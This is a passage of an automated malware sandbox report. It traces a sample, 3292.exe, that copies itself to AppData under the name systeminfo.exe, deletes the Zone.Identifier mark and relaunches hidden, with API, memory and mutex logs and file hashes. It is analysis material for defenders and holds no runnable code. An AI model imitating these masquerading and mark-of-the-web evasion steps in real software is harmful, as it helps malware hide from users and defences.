Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
Fn
System (13)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:12 (Local Time) True 6
Fn
Get Time type = Ticks, time = 93725 True 2
Fn
Get Time type = Ticks, time = 93741 True 2
Fn
Mutex (6)
+
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Process #5: 3292.exe
(Host: 86, Network: 0)
+
Information Value
ID #5
File Name c:\users\public\3292.exe
Command Line "C:\Users\Public\3292.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:31, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:52
OS Process Information
+
Information Value
PID 0xb44
Parent PID 0xb2c (c:\users\public\3292.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B48
0x B50
0x B54
0x BF0
0x BF4
0x BF8
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x000f1fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True True False
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable True True False
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable, Executable True True False
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True True False
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True True False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x001b0000 0x001b0fff Memory Mapped File Readable False False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d6fff Pagefile Backed Memory Readable True False False
private_0x00000000001e0000 0x001e0000 0x0021ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x00280000 0x00283fff Memory Mapped File Readable True False False
cversions.2.db 0x00280000 0x00283fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x00290000 0x002b4fff Memory Mapped File Readable True False False
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True True False
pagefile_0x00000000003c0000 0x003c0000 0x00547fff Pagefile Backed Memory Readable True False False
private_0x0000000000550000 0x00550000 0x005cffff Private Memory Readable, Writable True True False
pagefile_0x00000000005d0000 0x005d0000 0x00750fff Pagefile Backed Memory Readable True False False
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x00860000 0x00b2efff Memory Mapped File Readable False False False
pagefile_0x0000000000b30000 0x00b30000 0x00b30fff Pagefile Backed Memory Readable, Writable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db 0x00b40000 0x00b6ffff Memory Mapped File Readable True False False
cversions.2.db 0x00b70000 0x00b73fff Memory Mapped File Readable True False False
pagefile_0x0000000000b80000 0x00b80000 0x00b80fff Pagefile Backed Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
private_0x0000000002000000 0x02000000 0x021fffff Private Memory Readable, Writable True True False
pagefile_0x0000000002000000 0x02000000 0x020defff Pagefile Backed Memory Readable True False False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x020e0000 0x02145fff Memory Mapped File Readable True False False
private_0x0000000002160000 0x02160000 0x0219ffff Private Memory Readable, Writable True True False
private_0x00000000021c0000 0x021c0000 0x021fffff Private Memory Readable, Writable True True False
private_0x0000000002200000 0x02200000 0x025d0fff Private Memory Readable, Writable True True False
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True True False
private_0x0000000002370000 0x02370000 0x023affff Private Memory Readable, Writable True True False
private_0x00000000023e0000 0x023e0000 0x0241ffff Private Memory Readable, Writable True True False
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True True False
private_0x00000000025e0000 0x025e0000 0x026dffff Private Memory Readable, Writable True True False
private_0x00000000027d0000 0x027d0000 0x028cffff Private Memory Readable, Writable True True False
private_0x00000000028d0000 0x028d0000 0x029d0fff Private Memory Readable, Writable True True False
private_0x0000000002a10000 0x02a10000 0x02b0ffff Private Memory Readable, Writable True True False
private_0x0000000002ca0000 0x02ca0000 0x02d9ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002da0000 0x02da0000 0x03192fff Pagefile Backed Memory Readable True False False
comctl32.dll 0x74150000 0x742edfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74530000 0x74624fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b40000 0x74b55fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74b60000 0x74b80fff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74b90000 0x74b9cfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74ba0000 0x74baafff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74bb0000 0x74bc6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75650000 0x756d2fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x768a0000 0x768c6fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76900000 0x76a9cfff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76b10000 0x76b54fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x76c20000 0x76c31fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 120.00 KB (122880 bytes) MD5: ca6f2ee0e3b7218da76d126d22f707be
SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d
SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4
False
Host Behavior
File (9)
+
Operation Filename Additional Information Success Count Logfile
Get Info C:\ type = file_attributes True 1
Fn
Get Info C:\Users\ type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\ type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\ type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\ type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\ type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Fn
Move C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe source_filename = C:\Users\Public\3292.exe True 1
Fn
Delete C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe:Zone.Identifier - False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe os_pid = 0xbfc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (48)
+
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x752a0000 True 1
Fn
Load KERNEL32.dll base_address = 0x759f0000 True 1
Fn
Load USER32.dll base_address = 0x75790000 True 1
Fn
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Fn
Load advapi32.dll base_address = 0x756e0000 True 1
Fn
Load ole32.dll base_address = 0x75450000 True 1
Fn
Load shell32.dll base_address = 0x75c50000 True 1
Fn
Load crypt32.dll base_address = 0x758d0000 True 1
Fn
Load urlmon.dll base_address = 0x76c40000 True 1
Fn
Load userenv.dll base_address = 0x74bb0000 True 1
Fn
Load wininet.dll base_address = 0x75350000 True 1
Fn
Load wtsapi32.dll base_address = 0x74b90000 True 1
Fn
Get Filename - process_name = c:\users\public\3292.exe, file_name_orig = C:\Users\Public\3292.exe, size = 260 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3bfa94 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3bfacc True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (18)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 2
Fn
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:14 (Local Time) True 6
Fn
Get Time type = Ticks, time = 95815 True 4
Fn
Get Time type = Ticks, time = 97282 True 1
Fn
Get Time type = Ticks, time = 102289 True 1
Fn
Get Time type = Ticks, time = 103288 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (7)
+
Operation Additional Information Success Count Logfile
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Fn
Release - True 1
Fn
Process #6: systeminfo.exe
(Host: 59, Network: 0)
+
Information Value
ID #6
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:39, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:44
OS Process Information
+
Information Value
PID 0xbfc
Parent PID 0xb44 (c:\users\public\3292.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 740
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x000f1fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True False False
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable True True False
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable, Executable True False False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True True False
private_0x00000000001b0000 0x001b0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True True False
pagefile_0x00000000003e0000 0x003e0000 0x004befff Pagefile Backed Memory Readable True False False
private_0x0000000000560000 0x00560000 0x005dffff Private Memory Readable, Writable True True False
private_0x00000000005e0000 0x005e0000 0x006dffff Private Memory Readable, Writable True False False
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000860000 0x00860000 0x009e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000009f0000 0x009f0000 0x00b70fff Pagefile Backed Memory Readable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
private_0x00000000021b0000 0x021b0000 0x021bffff Private Memory Readable, Writable True True False
sortdefault.nls 0x021c0000 0x0248efff Memory Mapped File Readable False False False
private_0x0000000002490000 0x02490000 0x02860fff Private Memory Readable, Writable True True False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
Module (39)
+
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x752a0000 True 1
Fn
Load KERNEL32.dll base_address = 0x759f0000 True 1
Fn
Load USER32.dll base_address = 0x75790000 True 1
Fn
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3df76c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3df7a4 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x3df814 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x3df814 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x3df814 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3df814 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x3df814 True 1
Fn
